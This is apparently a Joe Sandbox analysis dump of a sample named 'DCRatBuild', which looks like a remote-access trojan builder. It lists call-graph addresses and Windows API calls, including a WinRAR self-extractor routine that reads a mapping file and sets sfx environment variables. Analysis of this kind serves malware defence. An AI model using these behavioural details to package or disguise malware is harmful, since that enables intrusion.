23842 73ca6c 23811->23842 23813 73935c 23813->23783 23815 73ca6c 114 API calls 23816 739314 23815->23816 23816->23813 23816->23815 23851 73cc51 97 API calls __vswprintf_c_l 23816->23851 23817->23765 23818->23785 23819->23768 23821 73c9b2 23820->23821 23822 73c9c4 23820->23822 23852 736249 80 API calls 23821->23852 23853 736249 80 API calls 23822->23853 23825 73c9bc 23825->23769 23826->23783 23827->23785 23829 741ad9 23828->23829 23830 741af2 23829->23830 23833 741b06 23829->23833 23854 74075b 84 API calls 23830->23854 23832 741af9 23832->23833 23834->23765 23835->23792 23836->23801 23837->23796 23838->23800 23840 73acf5 GetVersionExW 23839->23840 23841 737dcb 23840->23841 23841->23810 23849 73ca82 __vswprintf_c_l 23842->23849 23843 73cbf7 23844 73cc1f 23843->23844 23845 73ca0b 6 API calls 23843->23845 23846 74067c SetThreadExecutionState RaiseException 23844->23846 23845->23844 23848 73cbee 23846->23848 23847 7484bd 99 API calls 23847->23849 23848->23816 23849->23843 23849->23847 23849->23848 23850 73ab70 89 API calls 23849->23850 23850->23849 23851->23816 23852->23825 23853->23825 23854->23832 23855->23582 23856->23582 23857->23580 23859 735e4a 23858->23859 23903 735d67 23859->23903 23862 735e7d 23863 735eb5 23862->23863 23908 73ad65 CharUpperW CompareStringW 23862->23908 23863->23595 23865 738289 23864->23865 23914 74179d CharUpperW 23865->23914 23867 738333 23867->23598 23869 737d7b 23868->23869 23870 737dbb 23869->23870 23915 737043 74 API calls 23869->23915 23870->23605 23872 737db3 23916 736dc1 74 API calls 23872->23916 23874->23659 23876 739d73 23875->23876 23878 739d82 23875->23878 23877 739d79 FlushFileBuffers 23876->23877 23876->23878 23877->23878 23879 739dfb SetFileTime 23878->23879 23879->23663 23880->23586 23881->23589 23882->23590 23883->23605 23884->23605 23885->23603 23886->23618 23887->23611 23888->23618 23890 739992 GetFileType 23889->23890 23891 73998f 23889->23891 23892 7399a0 23890->23892 23891->23625 23892->23625 23893->23628 23894->23630 23895->23631 23896->23654 23897->23654 23898->23654 23899->23654 23900->23654 23901->23657 23902->23666 23909 735c64 23903->23909 23905 735d88 23905->23862 23907 735c64 2 API calls 23907->23905 23908->23862 23910 735c6e 23909->23910 23912 735d56 23910->23912 23913 73ad65 CharUpperW CompareStringW 23910->23913 23912->23905 23912->23907 23913->23910 23914->23867 23915->23872 23916->23870 23918 73c8db 23917->23918 23923 73a90e 84 API calls 23918->23923 23920 73c90d 23924 73a90e 84 API calls 23920->23924 23922 73c918 23923->23920 23924->23922 23926 73a5fe 23925->23926 23927 73a691 FindNextFileW 23926->23927 23928 73a621 FindFirstFileW 23926->23928 23929 73a6b0 23927->23929 23930 73a69c GetLastError 23927->23930 23931 73a638 23928->23931 23936 73a675 23928->23936 23929->23936 23930->23929 23932 73b66c 2 API calls 23931->23932 23933 73a64d 23932->23933 23934 73a651 FindFirstFileW 23933->23934 23935 73a66a GetLastError 23933->23935 23934->23935 23934->23936 23935->23936 23936->23532 23946 749d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23937->23946 23939 749d2d 23939->23279 23939->23280 23940 749d21 23940->23939 23947 749d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23940->23947 23942->23283 23943->23289 23944->23289 23945->23292 23946->23940 23947->23939 23948->23299 23950 739ef7 76 API calls 23949->23950 23951 731f5b 23950->23951 23952 7319a6 97 API calls 23951->23952 23955 731f78 23951->23955 23953 731f68 23952->23953 23953->23955 23956 736dc1 74 API calls 23953->23956 23955->23308 23955->23309 23956->23955 24825 74b8e0 93 API calls _swprintf 24826 748ce0 6 API calls 24829 7616e0 CloseHandle 24830 74acd0 100 API calls 24876 7419d0 26 API calls std::bad_exception::bad_exception 23962 7310d5 23967 735bd7 23962->23967 23968 735be1 __EH_prolog 23967->23968 23969 73b07d 82 API calls 23968->23969 23970 735bed 23969->23970 23976 735dcc GetCurrentProcess GetProcessAffinityMask 23970->23976 23985 74ead2 23986 74eade ___DestructExceptionObject 23985->23986 24011 74e5c7 23986->24011 23988 74eae5 23990 74eb0e 23988->23990 24091 74ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23988->24091 23997 74eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23990->23997 24022 75824d 23990->24022 23994 74eb2d ___DestructExceptionObject 23995 74ebad 24030 74f020 23995->24030 23997->23995 24092 757243 38 API calls 2 library calls 23997->24092 24006 74ebd9 24008 74ebe2 24006->24008 24093 75764a 28 API calls _abort 24006->24093 24094 74e73e 13 API calls 2 library calls 24008->24094 24012 74e5d0 24011->24012 24095 74ed5b IsProcessorFeaturePresent 24012->24095 24014 74e5dc 24096 752016 24014->24096 24016 74e5e1 24021 74e5e5 24016->24021 24105 7580d7 24016->24105 24019 74e5fc 24019->23988 24021->23988 24025 758264 24022->24025 24023 74ec4a _ValidateLocalCookies 5 API calls 24024 74eb27 24023->24024 24024->23994 24026 7581f1 24024->24026 24025->24023 24027 758220 24026->24027 24028 74ec4a _ValidateLocalCookies 5 API calls 24027->24028 24029 758249 24028->24029 24029->23997 24155 74f350 24030->24155 24033 74ebb3 24034 75819e 24033->24034 24157 75b290 24034->24157 24036 7581a7 24037 74ebbc 24036->24037 24161 75b59a 38 API calls 24036->24161 24039 74d5d4 24037->24039 24296 7400cf 24039->24296 24043 74d5f3 24345 74a335 24043->24345 24045 74d5fc 24349 7413b3 GetCPInfo 24045->24349 24047 74d606 ___scrt_fastfail 24048 74d619 GetCommandLineW 24047->24048 24049 74d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24048->24049 24050 74d628 24048->24050 24051 73400a _swprintf 51 API calls 24049->24051 24352 74bc84 24050->24352 24053 74d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24051->24053 24363 74aded LoadBitmapW 24053->24363 24056 74d636 OpenFileMappingW 24060 74d696 CloseHandle 24056->24060 24061 74d64f MapViewOfFile 24056->24061 24057 74d6a0 24357 74d287 24057->24357 24060->24049 24063 74d660 __vswprintf_c_l 24061->24063 24064 74d68d UnmapViewOfFile 24061->24064 24068 74d287 2 API calls 24063->24068 24064->24060 24070 74d67c 24068->24070 24069 748835 8 API calls 24071 74d76a DialogBoxParamW 24069->24071 24070->24064 24072 74d7a4 24071->24072 24073 74d7b6 Sleep 24072->24073 24074 74d7bd 24072->24074 24073->24074 24076 74d7cb 24074->24076 24393 74a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24074->24393 24077 74d7ea DeleteObject 24076->24077 24078 74d806 24077->24078 24079 74d7ff DeleteObject 24077->24079 24080 74d837 24078->24080 24081 74d849 24078->24081 24079->24078 24394 74d2e6 6 API calls 24080->24394 24390 74a39d 24081->24390 24083 74d83d CloseHandle 24083->24081 24085 74d883 24086 75757e GetModuleHandleW 24085->24086 24087 74ebcf 24086->24087 24087->24006 24088 7576a7 24087->24088 24530 757424 24088->24530 24091->23988 24092->23995 24093->24008 24094->23994 24095->24014 24097 75201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24096->24097 24109 75310e 24097->24109 24100 752029 24100->24016 24102 752031 24103 75203c 24102->24103 24123 75314a DeleteCriticalSection 24102->24123 24103->24016 24151 75b73a 24105->24151 24108 75203f 8 API calls 3 library calls 24108->24021 24110 753117 24109->24110 24112 753140 24110->24112 24114 752025 24110->24114 24124 753385 24110->24124 24129 75314a DeleteCriticalSection 24112->24129 24114->24100 24115 75215c 24114->24115 24144 75329a 24115->24144 24117 752166 24118 752171 24117->24118 24149 753348 6 API calls try_get_function 24117->24149 24118->24102 24120 75217f 24121 75218c 24120->24121 24150 75218f 6 API calls ___vcrt_FlsFree 24120->24150 24121->24102 24123->24100 24130 753179 24124->24130 24127 7533bc InitializeCriticalSectionAndSpinCount 24128 7533a8 24127->24128 24128->24110 24129->24114 24131 7531ad 24130->24131 24134 7531a9 24130->24134 24131->24127 24131->24128 24132 7531cd 24132->24131 24135 7531d9 GetProcAddress 24132->24135 24134->24131 24134->24132 24137 753219 24134->24137 24136 7531e9 __crt_fast_encode_pointer 24135->24136 24136->24131 24138 753241 LoadLibraryExW 24137->24138 24141 753236 24137->24141 24139 753275 24138->24139 24140 75325d GetLastError 24138->24140 24139->24141 24142 75328c FreeLibrary 24139->24142 24140->24139 24143 753268 LoadLibraryExW 24140->24143 24141->24134 24142->24141 24143->24139 24145 753179 try_get_function 5 API calls 24144->24145 24146 7532b4 24145->24146 24147 7532cc TlsAlloc 24146->24147 24148 7532bd 24146->24148 24148->24117 24149->24120 24150->24118 24154 75b753 24151->24154 24152 74ec4a _ValidateLocalCookies 5 API calls 24153 74e5ee 24152->24153 24153->24019 24153->24108 24154->24152 24156 74f033 GetStartupInfoW 24155->24156 24156->24033 24158 75b299 24157->24158 24159 75b2a2 24157->24159 24162 75b188 24158->24162 24159->24036 24161->24036 24163 758fa5 _abort 38 API calls 24162->24163 24164 75b195 24163->24164 24182 75b2ae 24164->24182 24166 75b19d 24191 75af1b 24166->24191 24169 75b1b4 24169->24159 24170 758518 __onexit 21 API calls 24171 75b1c5 24170->24171 24172 75b1f7 24171->24172 24198 75b350 24171->24198 24175 7584de _free 20 API calls 24172->24175 24175->24169 24176 75b1f2 24208 75895a 20 API calls __dosmaperr 24176->24208 24178 75b23b 24178->24172 24209 75adf1 26 API calls 24178->24209 24179 75b20f 24179->24178 24180 7584de _free 20 API calls 24179->24180 24180->24178 24183 75b2ba ___DestructExceptionObject 24182->24183 24184 758fa5 _abort 38 API calls 24183->24184 24189 75b2c4 24184->24189 24186 75b348 ___DestructExceptionObject 24186->24166 24189->24186 24190 7584de _free 20 API calls 24189->24190 24210 758566 38 API calls _abort 24189->24210 24211 75a3f1 EnterCriticalSection 24189->24211 24212 75b33f LeaveCriticalSection _abort 24189->24212 24190->24189 24192 753dd6 __cftof 38 API calls 24191->24192 24193 75af2d 24192->24193 24194 75af3c GetOEMCP 24193->24194 24195 75af4e 24193->24195 24196 75af65 24194->24196 24195->24196 24197 75af53 GetACP 24195->24197 24196->24169 24196->24170 24197->24196 24199 75af1b 40 API calls 24198->24199 24200 75b36f 24199->24200 24203 75b3c0 IsValidCodePage 24200->24203 24205 75b376 24200->24205 24207 75b3e5 ___scrt_fastfail 24200->24207 24201 74ec4a _ValidateLocalCookies 5 API calls 24202 75b1ea 24201->24202 24202->24176 24202->24179 24204 75b3d2 GetCPInfo 24203->24204 24203->24205 24204->24205 24204->24207 24205->24201 24213 75aff4 GetCPInfo 24207->24213 24208->24172 24209->24172 24211->24189 24212->24189 24214 75b02e 24213->24214 24222 75b0d8 24213->24222 24223 75c099 24214->24223 24217 74ec4a _ValidateLocalCookies 5 API calls 24219 75b184 24217->24219 24219->24205 24221 75a275 __vswprintf_c_l 43 API calls 24221->24222 24222->24217 24224 753dd6 __cftof 38 API calls 24223->24224 24225 75c0b9 MultiByteToWideChar 24224->24225 24227 75c0f7 24225->24227 24234 75c18f 24225->24234 24229 758518 __onexit 21 API calls 24227->24229 24235 75c118 __vsnwprintf_l ___scrt_fastfail 24227->24235 24228 74ec4a _ValidateLocalCookies 5 API calls 24230 75b08f 24228->24230 24229->24235 24237 75a275 24230->24237 24231 75c189 24242 75a2c0 20 API calls _free 24231->24242 24233 75c15d MultiByteToWideChar 24233->24231 24236 75c179 GetStringTypeW 24233->24236 24234->24228 24235->24231 24235->24233 24236->24231 24238 753dd6 __cftof 38 API calls 24237->24238 24239 75a288 24238->24239 24243 75a058 24239->24243 24242->24234 24244 75a073 __vswprintf_c_l 24243->24244 24245 75a099 MultiByteToWideChar 24244->24245 24246 75a24d 24245->24246 24247 75a0c3 24245->24247 24248 74ec4a _ValidateLocalCookies 5 API calls 24246->24248 24252 758518 __onexit 21 API calls 24247->24252 24254 75a0e4 __vsnwprintf_l 24247->24254 24249 75a260 24248->24249 24249->24221 24250 75a199 24279 75a2c0 20 API calls _free 24250->24279 24251 75a12d MultiByteToWideChar 24251->24250 24253 75a146 24251->24253 24252->24254 24270 75a72c 24253->24270 24254->24250 24254->24251 24258 75a170 24258->24250 24261 75a72c __vswprintf_c_l 11 API calls 24258->24261 24259 75a1a8 24260 758518 __onexit 21 API calls 24259->24260 24264 75a1c9 __vsnwprintf_l 24259->24264 24260->24264 24261->24250 24262 75a23e 24278 75a2c0 20 API calls _free 24262->24278 24264->24262 24265 75a72c __vswprintf_c_l 11 API calls 24264->24265 24266 75a21d 24265->24266 24266->24262 24267 75a22c WideCharToMultiByte 24266->24267 24267->24262 24268 75a26c 24267->24268 24280 75a2c0 20 API calls _free 24268->24280 24281 75a458 24270->24281 24273 75a75c 24276 74ec4a _ValidateLocalCookies 5 API calls 24273->24276 24275 75a79c LCMapStringW 24275->24273 24277 75a15d 24276->24277 24277->24250 24277->24258 24277->24259 24278->24250 24279->24246 24280->24250 24282 75a488 24281->24282 24285 75a484 24281->24285 24282->24273 24288 75a7b4 10 API calls 3 library calls 24282->24288 24283 75a4a8 24283->24282 24286 75a4b4 GetProcAddress 24283->24286 24285->24282 24285->24283 24289 75a4f4 24285->24289 24287 75a4c4 __crt_fast_encode_pointer 24286->24287 24287->24282 24288->24275 24290 75a515 LoadLibraryExW 24289->24290 24295 75a50a 24289->24295 24291 75a532 GetLastError 24290->24291 24292 75a54a 24290->24292 24291->24292 24293 75a53d LoadLibraryExW 24291->24293 24294 75a561 FreeLibrary 24292->24294 24292->24295 24293->24292 24294->24295 24295->24285 24297 74e360 24296->24297 24298 7400d9 GetModuleHandleW 24297->24298 24299 740154 24298->24299 24300 7400f0 GetProcAddress 24298->24300 24303 740484 GetModuleFileNameW 24299->24303 24404 7570dd 42 API calls 2 library calls 24299->24404 24301 740121 GetProcAddress 24300->24301 24302 740109 24300->24302 24301->24299 24304 740133 24301->24304 24302->24301 24312 7404a3 24303->24312 24304->24299 24306 7403be 24306->24303 24307 7403c9 GetModuleFileNameW CreateFileW 24306->24307 24308 7403fc SetFilePointer 24307->24308 24309 740478 CloseHandle 24307->24309 24308->24309 24310 74040c ReadFile 24308->24310 24309->24303 24310->24309 24316 74042b 24310->24316 24314 7404d2 CompareStringW 24312->24314 24317 740508 GetFileAttributesW 24312->24317 24318 740520 24312->24318 24395 73acf5 24312->24395 24398 740085 24312->24398 24314->24312 24315 740085 2 API calls 24315->24316 24316->24309 24316->24315 24317->24312 24317->24318 24319 74052a 24318->24319 24322 740560 24318->24322 24321 740542 GetFileAttributesW 24319->24321 24323 74055a 24319->24323 24320 74066f 24344 749da4 GetCurrentDirectoryW 24320->24344 24321->24319 24321->24323 24322->24320 24324 73acf5 GetVersionExW 24322->24324 24323->24322 24325 74057a 24324->24325 24326 7405e7 24325->24326 24327 740581 24325->24327 24328 73400a _swprintf 51 API calls 24326->24328 24329 740085 2 API calls 24327->24329 24330 74060f AllocConsole 24328->24330 24331 74058b 24329->24331 24332 740667 ExitProcess 24330->24332 24333 74061c GetCurrentProcessId AttachConsole 24330->24333 24334 740085 2 API calls 24331->24334 24405 7535b3 24333->24405 24335 740595 24334->24335 24337 73ddd1 53 API calls 24335->24337 24339 7405b0 24337->24339 24338 74063d GetStdHandle WriteConsoleW Sleep FreeConsole 24338->24332 24340 73400a _swprintf 51 API calls 24339->24340 24341 7405c3 24340->24341 24342 73ddd1 53 API calls 24341->24342 24343 7405d2 24342->24343 24343->24332 24344->24043 24346 740085 2 API calls 24345->24346 24347 74a349 OleInitialize 24346->24347 24348 74a36c GdiplusStartup SHGetMalloc 24347->24348 24348->24045 24350 7413d7 IsDBCSLeadByte 24349->24350 24350->24350 24351 7413ef 24350->24351 24351->24047 24355 74bc8e 24352->24355 24353 74bda4 24353->24056 24353->24057 24354 74179d CharUpperW 24354->24355 24355->24353 24355->24354 24407 73ecad 80 API calls ___scrt_fastfail 24355->24407 24358 74e360 24357->24358 24359 74d294 SetEnvironmentVariableW 24358->24359 24360 74d2b7 24359->24360 24361 74d2df 24360->24361 24362 74d2d3 SetEnvironmentVariableW 24360->24362 24361->24049 24362->24361 24364 74ae15 24363->24364 24365 74ae0e 24363->24365 24366 74ae2a 24364->24366 24367 74ae1b GetObjectW 24364->24367 24408 749e1c FindResourceW 24365->24408 24369 749d1a 4 API calls 24366->24369 24367->24366 24370 74ae3d 24369->24370 24371 74ae80 24370->24371 24372 74ae5c 24370->24372 24373 749e1c 13 API calls 24370->24373 24382 73d31c 24371->24382 24424 749d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24372->24424 24375 74ae4d 24373->24375 24375->24372 24377 74ae53 DeleteObject 24375->24377 24376 74ae64 24425 749d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24376->24425 24377->24372 24379 74ae6d 24426 749f5d 8 API calls ___scrt_fastfail 24379->24426 24381 74ae74 DeleteObject 24381->24371 24435 73d341 24382->24435 24384 73d328 24475 73da4e GetModuleHandleW FindResourceW 24384->24475 24387 748835 24388 74e24a new 8 API calls 24387->24388 24389 748854 24388->24389 24389->24069 24391 74a3cc GdiplusShutdown CoUninitialize 24390->24391 24391->24085 24393->24076 24394->24083 24396 73ad09 GetVersionExW 24395->24396 24397 73ad45 24395->24397 24396->24397 24397->24312 24399 74e360 24398->24399 24400 740092 GetSystemDirectoryW 24399->24400 24401 7400c8 24400->24401 24402 7400aa 24400->24402 24401->24312 24403 7400bb LoadLibraryW 24402->24403 24403->24401 24404->24306 24406 7535bb 24405->24406 24406->24338 24406->24406 24407->24355 24409 749e3e SizeofResource 24408->24409 24410 749e70 24408->24410 24409->24410 24411 749e52 LoadResource 24409->24411 24410->24364 24411->24410 24412 749e63 LockResource 24411->24412 24412->24410 24413 749e77 GlobalAlloc 24412->24413 24413->24410 24414 749e92 GlobalLock 24413->24414 24415 749f21 GlobalFree 24414->24415 24416 749ea1 __vswprintf_c_l 24414->24416 24415->24410 24417 749ea9 CreateStreamOnHGlobal 24416->24417 24418 749ec1 24417->24418 24419 749f1a GlobalUnlock 24417->24419 24427 749d7b GdipAlloc 24418->24427 24419->24415 24422 749eef GdipCreateHBITMAPFromBitmap 24423 749f05 24422->24423 24423->24419 24424->24376 24425->24379 24426->24381 24428 749d9a 24427->24428 24429 749d8d 24427->24429 24428->24419 24428->24422 24428->24423 24431 749b0f 24429->24431 24432 749b37 GdipCreateBitmapFromStream 24431->24432 24433 749b30 GdipCreateBitmapFromStreamICM 24431->24433 24434 749b3c 24432->24434 24433->24434 24434->24428 24436 73d34b _wcschr __EH_prolog 24435->24436 24437 73d37a GetModuleFileNameW 24436->24437 24438 73d3ab 24436->24438 24439 73d394 24437->24439 24477 7399b0 24438->24477 24439->24438 24441 739653 79 API calls 24443 73d7ab 24441->24443 24442 73d407 24488 755a90 26 API calls 3 library calls 24442->24488 24443->24384 24444 743781 76 API calls 24446 73d3db 24444->24446 24446->24442 24446->24444 24459 73d627 24446->24459 24447 73d41a 24489 755a90 26 API calls 3 library calls 24447->24489 24449 73d563 24449->24459 24507 739d30 77 API calls 24449->24507 24453 73d57d ___std_exception_copy 24454 739bf0 80 API calls 24453->24454 24453->24459 24457 73d5a6 ___std_exception_copy 24454->24457 24456 73d42c 24456->24449 24456->24459 24490 739e40 24456->24490 24498 739bf0 24456->24498 24506 739d30 77 API calls 24456->24506 24457->24459 24466 73d5b2 ___std_exception_copy 24457->24466 24508 74137a MultiByteToWideChar 24457->24508 24459->24441 24460 73d72b 24509 73ce72 76 API calls 24460->24509 24462 73da0a 24514 73ce72 76 API calls 24462->24514 24464 73d9fa 24464->24384 24465 73d771 24510 755a90 26 API calls 3 library calls 24465->24510 24466->24459 24466->24460 24466->24462 24466->24464 24472 741596 WideCharToMultiByte 24466->24472 24512 73dd6b 50 API calls __vsnprintf 24466->24512 24513 7558d9 26 API calls 3 library calls 24466->24513 24468 73d78b 24511 755a90 26 API calls 3 library calls 24468->24511 24469 73d742 24469->24465 24471 743781 76 API calls 24469->24471 24471->24469 24472->24466 24476 73d32f 24475->24476 24476->24387 24478 7399ba 24477->24478 24479 739a39 CreateFileW 24478->24479 24480 739aaa 24479->24480 24481 739a59 GetLastError 24479->24481 24483 739ae1 24480->24483 24484 739ac7 SetFileTime 24480->24484 24482 73b66c 2 API calls 24481->24482 24485 739a79 24482->24485 24483->24446 24484->24483 24485->24480 24486 739a7d CreateFileW GetLastError 24485->24486 24487 739aa1 24486->24487 24487->24480 24488->24447 24489->24456 24491 739e53 24490->24491 24492 739e64 SetFilePointer 24490->24492 24493 739e9d 24491->24493 24515 736fa5 75 API calls 24491->24515 24492->24493 24494 739e82 GetLastError 24492->24494 24493->24456 24494->24493 24496 739e8c 24494->24496 24496->24493 24516 736fa5 75 API calls 24496->24516 24501 739c03 24498->24501 24502 739bfc 24498->24502 24500 739cc0 24500->24502 24505 73984e 5 API calls 24500->24505 24501->24500 24501->24502 24504 739c9e 24501->24504 24517 73984e 24501->24517 24502->24456 24504->24502 24529 736f6b 75 API calls 24504->24529 24505->24500 24506->24456 24507->24453 24508->24466 24509->24469 24510->24468 24511->24459 24512->24466 24513->24466 24514->24464 24515->24492 24516->24493 24518 739867 ReadFile 24517->24518 24519 73985c GetStdHandle 24517->24519 24520 739880 24518->24520 24521 7398a0 24518->24521 24519->24518 24522 739989 GetFileType 24520->24522 24521->24501 24523 739887 24522->24523 24524 7398b7 24523->24524 24525 7398a8 GetLastError 24523->24525 24526 739895 24523->24526 24524->24521 24527 7398c7 GetLastError 24524->24527 24525->24521 24525->24524 24528 73984e GetFileType 24526->24528 24527->24521 24527->24526 24528->24521 24529->24502 24531 757430 _abort 24530->24531 24532 757448 24531->24532 24533 75757e _abort GetModuleHandleW 24531->24533 24552 75a3f1 EnterCriticalSection 24532->24552 24535 75743c 24533->24535 24535->24532 24564 7575c2 GetModuleHandleExW 24535->24564 24536 7574ee 24553 75752e 24536->24553 24539 7574c5 24543 7574dd 24539->24543 24547 7581f1 _abort 5 API calls 24539->24547 24541 757537 24573 761a19 5 API calls _ValidateLocalCookies 24541->24573 24542 75750b 24556 75753d 24542->24556 24548 7581f1 _abort 5 API calls 24543->24548 24547->24543 24548->24536 24549 757450 24549->24536 24549->24539 24572 757f30 20 API calls _abort 24549->24572 24552->24549 24574 75a441 LeaveCriticalSection 24553->24574 24555 757507 24555->24541 24555->24542 24575 75a836 24556->24575 24559 75756b 24562 7575c2 _abort 8 API calls 24559->24562 24560 75754b GetPEB 24560->24559 24561 75755b GetCurrentProcess TerminateProcess 24560->24561 24561->24559 24563 757573 ExitProcess 24562->24563 24565 7575ec GetProcAddress 24564->24565 24566 75760f 24564->24566 24567 757601 24565->24567 24568 757615 FreeLibrary 24566->24568 24569 75761e 24566->24569 24567->24566 24568->24569 24570 74ec4a _ValidateLocalCookies 5 API calls 24569->24570 24571 757628 24570->24571 24571->24532 24572->24539 24574->24555 24576 75a851 24575->24576 24577 75a85b 24575->24577 24579 74ec4a _ValidateLocalCookies 5 API calls 24576->24579 24578 75a458 __dosmaperr 5 API calls 24577->24578 24578->24576 24580 757547 24579->24580 24580->24559 24580->24560 24831 74eac0 27 API calls pre_c_initialization 24880 75ebc1 21 API calls __vswprintf_c_l 24881 7497c0 10 API calls 24833 759ec0 21 API calls 24882 75b5c0 GetCommandLineA GetCommandLineW 24834 74a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24885 7579b7 55 API calls _free 24836 7316b0 84 API calls 24605 7590b0 24613 75a56f 24605->24613 24608 7590c4 24610 7590cc 24611 7590d9 24610->24611 24621 7590e0 11 API calls 24610->24621 24614 75a458 __dosmaperr 5 API calls 24613->24614 24615 75a596 24614->24615 24616 75a5ae TlsAlloc 24615->24616 24617 75a59f 24615->24617 24616->24617 24618 74ec4a _ValidateLocalCookies 5 API calls 24617->24618 24619 7590ba 24618->24619 24619->24608 24620 759029 20 API calls 2 library calls 24619->24620 24620->24610 24621->24608 24622 75a3b0 24623 75a3bb 24622->24623 24625 75a3e4 24623->24625 24626 75a3e0 24623->24626 24628 75a6ca 24623->24628 24635 75a410 DeleteCriticalSection 24625->24635 24629 75a458 __dosmaperr 5 API calls 24628->24629 24630 75a6f1 24629->24630 24631 75a70f InitializeCriticalSectionAndSpinCount 24630->24631 24632 75a6fa 24630->24632 24631->24632 24633 74ec4a _ValidateLocalCookies 5 API calls 24632->24633 24634 75a726 24633->24634 24634->24623 24635->24626 24837 751eb0 6 API calls 3 library calls 24636 7576bd 24637 7576cc 24636->24637 24638 7576e8 24636->24638 24637->24638 24639 7576d2 24637->24639 24640 75b290 51 API calls 24638->24640 24659 75895a 20 API calls __dosmaperr 24639->24659 24642 7576ef GetModuleFileNameA 24640->24642 24644 757713 24642->24644 24643 7576d7 24660 758839 26 API calls __cftof 24643->24660 24661 7577e1 38 API calls 24644->24661 24646 7576e1 24648 757730 24662 757956 20 API calls 2 library calls 24648->24662 24650 75773d 24651 757746 24650->24651 24652 757752 24650->24652 24663 75895a 20 API calls __dosmaperr 24651->24663 24664 7577e1 38 API calls 24652->24664 24655 7584de _free 20 API calls 24655->24646 24656 757768 24657 7584de _free 20 API calls 24656->24657 24658 75774b 24656->24658 24657->24658 24658->24655 24659->24643 24660->24646 24661->24648 24662->24650 24663->24658 24664->24656 24839 7396a0 79 API calls 24889 75e9a0 51 API calls 24842 74e4a2 38 API calls 2 library calls 24890 752397 48 API calls 24685 74d997 24687 74d89b 24685->24687 24686 74df59 ___delayLoadHelper2@8 19 API calls 24686->24687 24687->24686 24844 747090 114 API calls 24845 74cc90 70 API calls 24891 74a990 97 API calls 24892 749b90 GdipCloneImage GdipAlloc 24689 74d891 19 API calls ___delayLoadHelper2@8 24893 759b90 21 API calls 2 library calls 24848 74a89d 78 API calls 24849 73ea98 FreeLibrary 24895 755780 QueryPerformanceFrequency QueryPerformanceCounter 24735 731385 82 API calls 3 library calls 24851 75ac0e 27 API calls _ValidateLocalCookies

                                        Executed Functions

                                        Function 0074D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 007400CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007400E4
                                          • Part of subcall function 007400CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007400F6
                                          • Part of subcall function 007400CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00740127
                                          • Part of subcall function 00749DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00749DAC
                                          • Part of subcall function 0074A335: OleInitialize.OLE32(00000000), ref: 0074A34E
                                          • Part of subcall function 0074A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0074A385
                                          • Part of subcall function 0074A335: SHGetMalloc.SHELL32(00778430), ref: 0074A38F
                                          • Part of subcall function 007413B3: GetCPInfo.KERNEL32(00000000,?), ref: 007413C4
                                          • Part of subcall function 007413B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007413D8
                                        • GetCommandLineW.KERNEL32 ref: 0074D61C
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0074D643
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0074D654
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0074D68E
                                          • Part of subcall function 0074D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0074D29D
                                          • Part of subcall function 0074D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0074D2D9
                                        • CloseHandle.KERNEL32(00000000), ref: 0074D697
                                        • GetModuleFileNameW.KERNEL32(00000000,0078DC90,00000800), ref: 0074D6B2
                                        • SetEnvironmentVariableW.KERNEL32(sfxname,0078DC90), ref: 0074D6BE
                                        • GetLocalTime.KERNEL32(?), ref: 0074D6C9
                                        • _swprintf.LIBCMT ref: 0074D708
                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0074D71A
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0074D721
                                        • LoadIconW.USER32(00000000,00000064), ref: 0074D738
                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0074D789
                                        • Sleep.KERNEL32(?), ref: 0074D7B7
                                        • DeleteObject.GDI32 ref: 0074D7F0
                                        • DeleteObject.GDI32(?), ref: 0074D800
                                        • CloseHandle.KERNEL32 ref: 0074D843
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
